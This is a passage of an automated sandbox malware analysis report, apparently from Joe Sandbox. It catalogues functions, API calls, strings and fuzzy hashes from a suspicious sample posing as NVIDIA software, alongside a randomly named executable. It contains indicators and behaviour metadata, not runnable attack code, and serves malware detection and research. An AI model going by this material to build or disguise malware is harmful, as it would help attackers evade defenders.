API ID: File$Attributes$CloseFindH_prologTime_wcslen
String ID: :
API String ID: 3226429890-336475711
Opcode ID: 4fea321dbf4fb7375c9c09ef5a9cec7d3b33f215167b03e3376380eb442f8ee7
Instruction ID: b11a4c151c29fc10881f168db68412f4009bbab564832e87430acea193625797
Opcode Fuzzy Hash: 4fea321dbf4fb7375c9c09ef5a9cec7d3b33f215167b03e3376380eb442f8ee7
Instruction Fuzzy Hash: 74417171900259A9FB36EB64CC58EEEB77CAF55300F0040D6A6CAA70D2DB785B85CB71

Function 0101B48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0101B4E3
_wcslen.LIBCMT ref: 0101B4FE

Strings

}, xrefs: 0101B4D6

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: _wcslen
String ID: }
API String ID: 176396367-4239843852
Opcode ID: 936d77c377cc58b1bea087efe988a2fe98ba6f7a71d594fa6bd6df2701d6a35c
Instruction ID: 528b68e383d7d2e985ceb3394e070aaf384fcab9c4249081fc2a5a519314684d
Opcode Fuzzy Hash: 936d77c377cc58b1bea087efe988a2fe98ba6f7a71d594fa6bd6df2701d6a35c
Instruction Fuzzy Hash: 3221C67290431A5ADB32DB68D844FABB3FCEF95750F04046AE6C0C7145EB6DD94883A2

Function 0100F344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0100F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0100F2E4
Part of subcall function 0100F2C5: GetProcAddress.KERNEL32(010481C8,CryptUnprotectMemory), ref: 0100F2F4

GetCurrentProcessId.KERNEL32(?,?,?,0100F33E), ref: 0100F3D2

Strings

CryptProtectMemory failed, xrefs: 0100F389
CryptUnprotectMemory failed, xrefs: 0100F3CA

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: 009ee6bf3ed401f1bfecaae41a644a3f8b752ee455c99ac1d05672a3976549e1
Instruction ID: 88968022f55c8b13e60e87dd97a202f24e5968efcf44f9cbcf7f2f7151350bc2
Opcode Fuzzy Hash: 009ee6bf3ed401f1bfecaae41a644a3f8b752ee455c99ac1d05672a3976549e1
Instruction Fuzzy Hash: C5110631A0062B6BFB33AB24D881A6E3B98FF00670F04C157FCC15F2D5DA75A9419791

Function 0100B991 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0100B9B8

Part of subcall function 01004092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 010040A5

Strings

%c:\, xrefs: 0100B9AE

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 1543624204-3142399695
Opcode ID: 72ce45eff15f3600f4345f462fee55527617bec1800ae13176782f19b889a33e
Instruction ID: db617449798f4af6a5e0494c7b9b00353db38c05a3b0950266c7a506ce3bb9a3
Opcode Fuzzy Hash: 72ce45eff15f3600f4345f462fee55527617bec1800ae13176782f19b889a33e
Instruction Fuzzy Hash: 9201F56750032379FA72AB7D8C84DABB7ECEE96670F40491BF5C4D60C1EA34D48482B1

Function 0101101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00010000,01011160,?,00000000,00000000), ref: 01011043
SetThreadPriority.KERNEL32(?,00000000), ref: 0101108A

Part of subcall function 01006C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 01006C54

Strings

CreateThread failed, xrefs: 0101104F

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: Thread$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2655393344-3849766595
Opcode ID: ae85d343ab2057327c7bbb679deabad2b66b98f40ec746ea108c98583d145588
Instruction ID: 206cfdbbd0883072cb6439eb0a098a7f4a1882cda37c427025e3a8e6eed6be5e
Opcode Fuzzy Hash: ae85d343ab2057327c7bbb679deabad2b66b98f40ec746ea108c98583d145588
Instruction Fuzzy Hash: 3201A7F574430A6BE2355E749C91BB6B399EB40651F10002EF6C65A285CAF668848624

Function 01001316 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 0100E2E8: _swprintf.LIBCMT ref: 0100E30E
Part of subcall function 0100E2E8: _strlen.LIBCMT ref: 0100E32F
Part of subcall function 0100E2E8: SetDlgItemTextW.USER32(?,0103E274,?), ref: 0100E38F
Part of subcall function 0100E2E8: GetWindowRect.USER32(?,?), ref: 0100E3C9
Part of subcall function 0100E2E8: GetClientRect.USER32(?,?), ref: 0100E3D5

GetDlgItem.USER32(00000000,00003021), ref: 0100135A
SetWindowTextW.USER32(00000000,010335F4), ref: 01001370

Strings

0, xrefs: 01001319

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: 0
API String ID: 2622349952-4108050209
Opcode ID: f6b751423ced894b052c88f3860024e1f709eb490e2cb8d31f6b4898ef387fa9
Instruction ID: 65b811ef1a5752bd3bbe4d2a0fe35db3247a4442338e297b6d4ecb649b1af4a4
Opcode Fuzzy Hash: f6b751423ced894b052c88f3860024e1f709eb490e2cb8d31f6b4898ef387fa9
Instruction Fuzzy Hash: 75F03C7010438CABFF671F64C80DAEA3FA9AB44355F048554FDC8595E1CB79C5909B50

Function 01010FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,01011206,?), ref: 01010FEA
GetLastError.KERNEL32(?), ref: 01010FF6

Part of subcall function 01006C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 01006C54

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 01010FFF

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: babe8eb073632b6e2df6a7a181251be46afc9b4c3b0fbdfb0cc57c3bd37f96cb
Instruction ID: 51e0d02caec95f89a0b6c173f2cde64c3ea88b909fc38d0b2ed7971a485457a1
Opcode Fuzzy Hash: babe8eb073632b6e2df6a7a181251be46afc9b4c3b0fbdfb0cc57c3bd37f96cb
Instruction Fuzzy Hash: ECD02B71A0453537D52232349C44DBE7809DB21331F104B04F1B8592D9CA6A49514791

Function 0100E29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,0100DA55,?), ref: 0100E2A3
FindResourceW.KERNEL32(00000000,RTL,00000005,?,0100DA55,?), ref: 0100E2B1

Strings

RTL, xrefs: 0100E2AB

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: 371d609f941b6b2d0f755d35130536fca736c8c4e843f2711f909dc00b00acdb
Instruction ID: 2d604e4db904fe36c96a5bc6f3f98bf81548d637e8a196ca89d90fe7ac456572
Opcode Fuzzy Hash: 371d609f941b6b2d0f755d35130536fca736c8c4e843f2711f909dc00b00acdb
Instruction Fuzzy Hash: 3FC0123164071066F63016656D9DB43AE5C6B00B11F05044CB2C1ED1C5D6AAC48187A0

Analysis Process: NVIDIA Container.exePID: 1472, Parent PID: 6596COMMON

Execution Graph

Execution Coverage:	2.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	4
Total number of Limit Nodes:	0

Executed Functions

Function 00007FF848F1070D Relevance: 1.7, APIs: 1, Instructions: 466
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32 ref: 00007FF848F23B8F

Memory Dump Source

Source File: 00000005.00000002.2123601338.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_NVIDIA Container.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: e5a7d5ed74c3456665513d535406e9c9f666e354a49c0efccd189191c23c4758
Instruction ID: b0bf94089c0d14e29eb4c5ffbd4ded8cf149b3ab95fc62a6d321a7e1cba9024d
Opcode Fuzzy Hash: e5a7d5ed74c3456665513d535406e9c9f666e354a49c0efccd189191c23c4758
Instruction Fuzzy Hash: 36F1AF7091C68D8FDB85EF68D855AEDBBF0FF59300F0001AAE449D3292DB35A985CB81

Function 00007FF848F10730 Relevance: 1.7, APIs: 1, Instructions: 452
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32 ref: 00007FF848F23B8F

Memory Dump Source

Source File: 00000005.00000002.2123601338.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_NVIDIA Container.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1f8c4caf9c82ec01cc04206f06bfe1da02c2bce9511ee6ded9116b34113b20e4
Instruction ID: f8f5661888c6745d8b65fcfd85f0a3a4d327779b20d5e5e92af059220be59558
Opcode Fuzzy Hash: 1f8c4caf9c82ec01cc04206f06bfe1da02c2bce9511ee6ded9116b34113b20e4
Instruction Fuzzy Hash: 93E19F7091C68D8FDB95EF68D895BE9BBF0FF59300F0001AAD449D3292DB35A985CB81

Function 00007FF848F10750 Relevance: 1.7, APIs: 1, Instructions: 440
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32 ref: 00007FF848F23B8F

Memory Dump Source

Source File: 00000005.00000002.2123601338.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_NVIDIA Container.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 299bab268b4494b41ab961bdccd76e1954e7fb09ed1b7a8bdc88ee5661b38cfd
Instruction ID: 2a9435ee20f51188dea3b0980ff536d71b55b1b4db7151a8278117f985711609
Opcode Fuzzy Hash: 299bab268b4494b41ab961bdccd76e1954e7fb09ed1b7a8bdc88ee5661b38cfd
Instruction Fuzzy Hash: 54E1907091C68D8FDB95EF68D845BE9BBF0FF59300F0001AAD449D3292DB35A985CB81

Function 00007FF8490C4565 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2126356884.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff8490c0000_NVIDIA Container.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a49597f9726d901023b83eb40db20cce7044491fc234da23002aa684ebb3bb9
Instruction ID: f1b9f63e89ce49cfeadb82bc192e4b473d61a3c1db7daa98f4d3cc977933db39
Opcode Fuzzy Hash: 4a49597f9726d901023b83eb40db20cce7044491fc234da23002aa684ebb3bb9
Instruction Fuzzy Hash: C0619F31D0D68A9FEB58EFA4C495AFABBB0FF54344F14017AD009D729ADF38A8418B40

Function 00007FF8490C6604 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2126356884.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff8490c0000_NVIDIA Container.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee38a10767a3e1a7746230949e44b3c2f7ea3244eaf749ce7867c2f0ad3b0414
Instruction ID: e0445e96cbc693ae12af5b088a3d9fdf5fe993edc132f9b9ebcce63120bde9d2
Opcode Fuzzy Hash: ee38a10767a3e1a7746230949e44b3c2f7ea3244eaf749ce7867c2f0ad3b0414
Instruction Fuzzy Hash: 04117070D0944B8FDB69EF58C06DABA77E1FF94341F144279D10AEB296CE38B9458B80

Analysis Process: hBoBqOIwjXsCbkOMEKwZ.exePID: 2520, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	4%
Dynamic/Decrypted Code Coverage:	40%
Signature Coverage:	0%
Total number of Nodes:	15
Total number of Limit Nodes:	0

Executed Functions

Function 00007FF848F2B6BD Relevance: 4.6, Strings: 2, Instructions: 2108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

NM_H, xrefs: 00007FF848F2D671
lM_H, xrefs: 00007FF848F2B874

Memory Dump Source

Source File: 0000000C.00000002.2179939802.00007FF848F2B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F2B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848f2b000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID: NM_H$lM_H
API String ID: 0-209739149
Opcode ID: 5a7c3a2089b750e975485a11191f3a3dec82ae9dafec172bb6f57ef921024933
Instruction ID: b49bdce1d0eba6965a67d806dac71464122cb15f2d83770f0e92f08f1cb26d67
Opcode Fuzzy Hash: 5a7c3a2089b750e975485a11191f3a3dec82ae9dafec172bb6f57ef921024933
Instruction Fuzzy Hash: 3D03C870D0992D8FDB98EB18D895AA9B7B1FF58341F1042E9D00DE3296DB35AE81CF44

Function 00007FF8490EF042 Relevance: 1.9, Strings: 1, Instructions: 665
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

-<_H, xrefs: 00007FF8490EF6D1

Memory Dump Source

Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID: -<_H
API String ID: 0-457784370
Opcode ID: f86db1068b49c66e26411cc63f4a7825aa4674961c8ec1a52f11969929f516f1
Instruction ID: bbd6df19f12cf74f448d6d45dd254609ff42df5e89695a630ec26eb06894155e
Opcode Fuzzy Hash: f86db1068b49c66e26411cc63f4a7825aa4674961c8ec1a52f11969929f516f1
Instruction Fuzzy Hash: 13323970959A8D8FEFB8EF28C8597E937E1FB58351F10412AD84DCB291DB789680CB41

Function 00007FF8490EDBEA Relevance: .7, Instructions: 692COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7a7ba2b42ac2d7a7be9025ce1a01c691fab73639514ea5eb7ecc8f5f4cd122d
Instruction ID: 92427449b2cedbfc500b76e3da9fd1fecdb0c2148af31ba511e1aa08a2533c53
Opcode Fuzzy Hash: a7a7ba2b42ac2d7a7be9025ce1a01c691fab73639514ea5eb7ecc8f5f4cd122d
Instruction Fuzzy Hash: 07322B70919A8D8FEFB8EF28C8597E937E1FB69341F00412AD84DC7691DB789580CB45

Function 00007FF848F10DAC Relevance: .3, Instructions: 289COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2179939802.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848f10000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b242c6330ad955446a38e88d608d5ead46d21cce16a79bbce8e32156b861886
Instruction ID: adb46d11f91034c6033826e10dbdc56a63bd717854ce51f215ad1d163284592a
Opcode Fuzzy Hash: 1b242c6330ad955446a38e88d608d5ead46d21cce16a79bbce8e32156b861886
Instruction Fuzzy Hash: A6A1BA71D1DA9A9FE799EB28C8557AA7FE1FB99340F00017AD109E72D2CF781842C750

Function 00007FF8490E2178 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4143b7340054bef42e990be43d6619a5f2d506a7c39de85d99c4cac6f31de5d6
Instruction ID: d64d1e167555771107c399126a35d292089b31adf325b1295092da6c8dc4453b
Opcode Fuzzy Hash: 4143b7340054bef42e990be43d6619a5f2d506a7c39de85d99c4cac6f31de5d6
Instruction Fuzzy Hash: 5FF01935C0D159DFEF24EE98E8809FCB3B5BB95380F10116AD006A7292DB38AA45CB00

Function 00007FF8490DE5D8 Relevance: 2.7, Strings: 2, Instructions: 157
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

xOI, xrefs: 00007FF8490DE787
, xrefs: 00007FF8490DE652

Memory Dump Source

Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID: $xOI
API String ID: 0-3989629094
Opcode ID: a51e9965f9e0c496397e6aafe2b2d36406592f449a2f0b099060ed0aa4c781e9
Instruction ID: a36d810b5e7f3b3ee31815e116dd70ebfd16aa0c6bd18ecfc1e005e38f2d66c2
Opcode Fuzzy Hash: a51e9965f9e0c496397e6aafe2b2d36406592f449a2f0b099060ed0aa4c781e9
Instruction Fuzzy Hash: 45516C70D0C58A9FEB59EFA8C4585FDBBB5FF48340F1045BAC00AE7286DA38A945CB50

Function 00007FF848F19DC1 Relevance: 2.5, Strings: 2, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

X, xrefs: 00007FF848F14E70
., xrefs: 00007FF848F19DF2

Memory Dump Source

Source File: 0000000C.00000002.2179939802.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848f10000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID: .$X
API String ID: 0-1506445976
Opcode ID: 0a3d06dbb898516eb5c4b9f0037aa2326eacb321a347d1b61a4c66ff55c4126a
Instruction ID: d9ddb999048f3af8c650fce20fb5c9e20bfaaaf14ded0af2f72f55149dafc962
Opcode Fuzzy Hash: 0a3d06dbb898516eb5c4b9f0037aa2326eacb321a347d1b61a4c66ff55c4126a
Instruction Fuzzy Hash: 2C11C5709482298FEB64EB14C8987ECB3B1FB94351F5052E9D50DA62C2CB785EC9CF48

Function 00007FF8490F0540 Relevance: 2.3, Strings: 1, Instructions: 1020
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

[, xrefs: 00007FF8490F05DC

Memory Dump Source

Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID: [
API String ID: 0-784033777
Opcode ID: 61eb0a76b2905252b2db9fb1815fa857627866a778c1ba7830811a4810d4ecbd
Instruction ID: 679926bb26417a3d55f4865c0254ac1a41be70cc82b785384b2f3ba118a4aac0
Opcode Fuzzy Hash: 61eb0a76b2905252b2db9fb1815fa857627866a778c1ba7830811a4810d4ecbd
Instruction Fuzzy Hash: 24924470A4891C8FCFA9EF18C894FA9B7B1FB69305F1041D9910EE7665DA31AE81CF44

Function 00007FF8490E7228 Relevance: 2.0, Instructions: 1952
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adf9f58a95e040d259f2aaa9d0857a2021b98548827871d81dedf5c26335607e
Instruction ID: 24b3b7a5bc4cfb99e86d719732777e2427874f5781e35ed982ee185b520fff17
Opcode Fuzzy Hash: adf9f58a95e040d259f2aaa9d0857a2021b98548827871d81dedf5c26335607e
Instruction Fuzzy Hash: B0F2747194895D8FDFA8EF18C894FA9B7B1FB69301F1401E9900EE7291DA35AE81CF44

Function 00007FF848F767C1 Relevance: 1.8, APIs: 1, Instructions: 279
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileTransactedW.KERNEL32 ref: 00007FF848F769A2

Memory Dump Source

Source File: 0000000C.00000002.2179939802.00007FF848F6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848f6f000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID: CreateFileTransacted
String ID:
API String ID: 2149338676-0
Opcode ID: 8146f35d4a4892baf745a25eef0d04b68cffb3fe5e5c741d55ff99e41b72f7e1
Instruction ID: f0bf8f2ad470c41416b4b95f2fa0d542b294f8713f13713833422a53833f83ca
Opcode Fuzzy Hash: 8146f35d4a4892baf745a25eef0d04b68cffb3fe5e5c741d55ff99e41b72f7e1
Instruction Fuzzy Hash: FD81DC70908A5C8FDB98EF58C894BA9BBF1FB69300F1051AED04EE3651DB75A980CB44

Function 00007FF8490EEA86 Relevance: 1.7, Strings: 1, Instructions: 469
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

5<_H, xrefs: 00007FF8490EEECD

Memory Dump Source

Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID: 5<_H
API String ID: 0-2397324098
Opcode ID: 2b8c9ba012f448ec21bcc36eb5a398573e4057ece4c20067e2075775439ef5de
Instruction ID: 1ce49f9ef4e2e09f5f7a90197d8d5a0999e0da0f963bcb5d1946880ac6174391
Opcode Fuzzy Hash: 2b8c9ba012f448ec21bcc36eb5a398573e4057ece4c20067e2075775439ef5de
Instruction Fuzzy Hash: 69F15B70909A8D8FEFB8EF28C859BE937E1FB59341F10412AD84EC7291DB799580CB41

Function 00007FF848F76B21 Relevance: 1.7, APIs: 1, Instructions: 213
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

